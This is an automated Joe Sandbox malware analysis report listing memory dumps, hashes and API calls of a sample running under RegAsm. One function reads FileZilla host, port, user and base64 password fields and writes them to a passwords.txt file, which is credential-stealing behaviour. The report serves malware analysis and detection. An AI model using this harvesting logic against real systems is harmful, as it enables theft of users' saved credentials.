Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction ID: 20c8bd4428e76a4b30bec45b3bbb04baf5681d652307d79b9733d4843f968c78
Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction Fuzzy Hash: C941B0792043129FEB14DF14C884AA7B7E4EF88215F20457AFD9187A91E762F8948B71

Uniqueness

Uniqueness Score: -1.00%

Function 00409330 Relevance: 9.1, APIs: 6, Instructions: 98stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409359
lstrlen.KERNEL32(004096B6,00000001,?,00001FA0,00000000,00000000,?,004096B6), ref: 00409376
CryptStringToBinaryA.CRYPT32(004096B6,00000000,?,004096B6), ref: 0040937E
memcpy.MSVCRT ref: 004093F1
lstrcat.KERNEL32(00427AA7,00427AAB), ref: 0040942D
lstrcat.KERNEL32(00427AA7,00427AAE), ref: 0040944F

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 2615ec560cdb2c1a10ecaa05070d148f4a90f8d52c94285c4d2187c6f722cb7f
Instruction ID: adffa3e7da8eb43a5bcae6fb888e125dec844c82986ee0a6d8cae4d8ea5a37e5
Opcode Fuzzy Hash: 2615ec560cdb2c1a10ecaa05070d148f4a90f8d52c94285c4d2187c6f722cb7f
Instruction Fuzzy Hash: 8131F575B04219ABCB00DB84EC46BEF7779EF85715F14407AFA08A6280D7745A048BEA

Uniqueness

Uniqueness Score: -1.00%

Function 1C2D1FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1C2D2001

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: a39c1a1d04676cfa7f2df25bc3b78f4eeff55dbb561b0f2d67299b1f71315486
Instruction ID: bdb5a88a565f901562dbe95d3007a1f84f9db5b47b066c4125c2fe050c2121ee
Opcode Fuzzy Hash: a39c1a1d04676cfa7f2df25bc3b78f4eeff55dbb561b0f2d67299b1f71315486
Instruction Fuzzy Hash: 90210EB5500306AFEB109F69CC80FA677A9EF25325F154118F440A7111DB62F828CFB9

Uniqueness

Uniqueness Score: -1.00%

Function 1C253AA3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 1C44365A
IsValidCodePage.KERNEL32(00000000), ref: 1C443698
IsValidLocale.KERNEL32(?,00000001), ref: 1C4436AB
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 1C4436F3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1C44370E

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: fa75a31f11df641d6de4f7c8937f9afbf9c011017dc751c3db7858316c5ca688
Instruction ID: 78cd814cbe43c14df49ea96e62c3b3cbeef7a0633dc57326ed4952e779d5e086
Opcode Fuzzy Hash: fa75a31f11df641d6de4f7c8937f9afbf9c011017dc751c3db7858316c5ca688
Instruction Fuzzy Hash: 7A515FB5A09216ABFB10DFA5D881EEE77B8AF18F11F314429E515D7280EB70A504CB70

Uniqueness

Uniqueness Score: -1.00%

Function 004117A0 Relevance: 6.1, APIs: 4, Instructions: 63memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
HeapAlloc.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
Instruction ID: 21c28c5b9c274bc113086ca6f345efa6a7341173b31fdfb7d0b317eddc9c08d9
Opcode Fuzzy Hash: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
Instruction Fuzzy Hash: 3F111275200209ABDB10DFA5EC85EEB77EDEF4A351F10455AFD18D7340D7719C518AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406F10 Relevance: 6.1, APIs: 4, Instructions: 54encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 0cf6c307582c09c58365ce669227be7a52b012e3e5f8b937cc83d1a50c8f3791
Instruction ID: c5d6de6eb5c64771bd9390db4b19ad01a52cb4a27094bb8536fc16c2df0bce05
Opcode Fuzzy Hash: 0cf6c307582c09c58365ce669227be7a52b012e3e5f8b937cc83d1a50c8f3791
Instruction Fuzzy Hash: CF014F76340312BBE7204FA5AC55F56B7ACEF05B61F200022FB09EB2C0D7B5A8108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1C313770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction ID: 8c50d230344316391f2836d792c1718583afa939b94c110eff33cc08283336b8
Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction Fuzzy Hash: ECE0B63A004700ABCA229F90DE46ECBBFA6BF48711F150C1CF5C521671C773A868AB56

Uniqueness

Uniqueness Score: -1.00%

Function 1C2F5910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1C2F597E

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: 5f16783483bb1f4f06b696bd2a3898f14ba98197613d72c4bcf12955efdc9b21
Instruction ID: 9bf2af2168ca175468849c37c7b17c32c47cbd56e2e18a8914d74a881bedf25b
Opcode Fuzzy Hash: 5f16783483bb1f4f06b696bd2a3898f14ba98197613d72c4bcf12955efdc9b21
Instruction Fuzzy Hash: F91136B6500606ABE710DF55CC84FD6BBADFF45314F004554F5089B292C3B6B5A8CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 1C2F55B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec878228d7ffc1bc7c326e46f1a696520626a6624617a8b76c4efdaf09513845
Instruction ID: 333213f2ac5b54aeb9f067e1f1e26ea0c75717bc77da731680db4f52cfc47b69
Opcode Fuzzy Hash: ec878228d7ffc1bc7c326e46f1a696520626a6624617a8b76c4efdaf09513845
Instruction Fuzzy Hash: 37318DB5600306AFEB10CF2ADC84B6BB7E9EF84314F204928F9468B251E771E954CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040C050 Relevance: 93.4, APIs: 62, Instructions: 429memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040BF10: lstrlen.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BF5F
Part of subcall function 0040BF10: strchr.MSVCRT ref: 0040BF75

GetProcessHeap.KERNEL32(00000008,0040C8C0,?,75AA5460,00000000,?,?,?,?,?,?,?,?,004215B1,000000FF), ref: 0040C0B1
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?,?), ref: 0040C0B8
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?), ref: 0040C0CD
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?,?), ref: 0040C0D4
strcpy_s.MSVCRT ref: 0040C0F1
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040C102
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004215B1), ref: 0040C109
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C133
HeapFree.KERNEL32(00000000), ref: 0040C13A
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C146
HeapAlloc.KERNEL32(00000000), ref: 0040C14D
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C162
HeapFree.KERNEL32(00000000), ref: 0040C169
strcpy_s.MSVCRT ref: 0040C18C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C19A
HeapFree.KERNEL32(00000000), ref: 0040C1A1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C1C0
HeapFree.KERNEL32(00000000), ref: 0040C1C7
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C1D3
HeapAlloc.KERNEL32(00000000), ref: 0040C1DA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C1EF
HeapFree.KERNEL32(00000000), ref: 0040C1F6
strcpy_s.MSVCRT ref: 0040C219
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C227
HeapFree.KERNEL32(00000000), ref: 0040C22E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C256
HeapFree.KERNEL32(00000000), ref: 0040C25D
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C269
HeapAlloc.KERNEL32(00000000), ref: 0040C270
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C285
HeapFree.KERNEL32(00000000), ref: 0040C28C
strcpy_s.MSVCRT ref: 0040C2AC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C2BD
HeapFree.KERNEL32(00000000), ref: 0040C2C4
lstrlen.KERNEL32(00000000), ref: 0040C2CB
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C2DD
HeapAlloc.KERNEL32(00000000), ref: 0040C2E4
lstrlen.KERNEL32(00000000), ref: 0040C305

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

strcpy_s.MSVCRT ref: 0040C32B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C342
HeapFree.KERNEL32(00000000), ref: 0040C349
lstrlen.KERNEL32(00000000), ref: 0040C350
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C35F
HeapAlloc.KERNEL32(00000000), ref: 0040C366
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C374
HeapFree.KERNEL32(00000000), ref: 0040C37B

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

strcpy_s.MSVCRT ref: 0040C397
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C3A3
HeapFree.KERNEL32(00000000), ref: 0040C3AA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C3D7
HeapFree.KERNEL32(00000000), ref: 0040C3DE
GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C3EA
HeapAlloc.KERNEL32(00000000), ref: 0040C3F1
strcpy_s.MSVCRT ref: 0040C407
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C416
HeapFree.KERNEL32(00000000), ref: 0040C41D
lstrlen.KERNEL32(00000000,00000000,?,?,?), ref: 0040C491
lstrlen.KERNEL32(00000000,00000000), ref: 0040C4A1
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C530
HeapFree.KERNEL32(00000000), ref: 0040C537

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$lstrcpymallocstrchrstrncpy
String ID:
API String ID: 3662779188-0
Opcode ID: 94de16d627383293b9dc17cc193afd69119facb2a0f6166f012a74c18b98ba21
Instruction ID: b40cbd5fc23cbd84975b33a862b5865f3c8f674952f2fc639572ad373f1cfd8d
Opcode Fuzzy Hash: 94de16d627383293b9dc17cc193afd69119facb2a0f6166f012a74c18b98ba21
Instruction Fuzzy Hash: DFE16575900216EBCB14EBE0DC99EAF7B79FF49304F50552AFA02B3281DB385905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB59 Relevance: 66.8, APIs: 28, Strings: 10, Instructions: 295stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
lstrcat.KERNEL32(?,00000000), ref: 0040CD55
lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
lstrcat.KERNEL32(?,00000000), ref: 0040CD77
lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

strtok_s.MSVCRT ref: 0040CE3B
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
memset.MSVCRT ref: 0040CEA5

Strings

Password: , xrefs: 0040CDC0
Soft: FileZilla, xrefs: 0040CD2D
<Host>, xrefs: 0040CB60
O{BN{BK{B, xrefs: 0040CE1C
passwords.txt, xrefs: 0040CE64
<User>, xrefs: 0040CBEA
<Port>, xrefs: 0040CBA2
<Pass encoding="base64">, xrefs: 0040CC32
Host: , xrefs: 0040CD3C
Login: , xrefs: 0040CD8F

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$mallocmemsetstrncpystrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$passwords.txt
API String ID: 368316605-4044742749
Opcode ID: a71d7c5eb2794acaf3baeb6c0767e04cec7d8e32e5adc8a198758464054fccae
Instruction ID: 003d06b88ee209d3646e7d5b0c8682ef30a99e174e8e8da48fb9cda7d86fbdc0
Opcode Fuzzy Hash: a71d7c5eb2794acaf3baeb6c0767e04cec7d8e32e5adc8a198758464054fccae
Instruction Fuzzy Hash: F5B1B575904219AACB04EBA1DC56BEEBB78BF19304F50046EF501B3192DF786A48CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409460 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 297stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409579
GetFileSize.KERNEL32(00000000,00000000,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409582
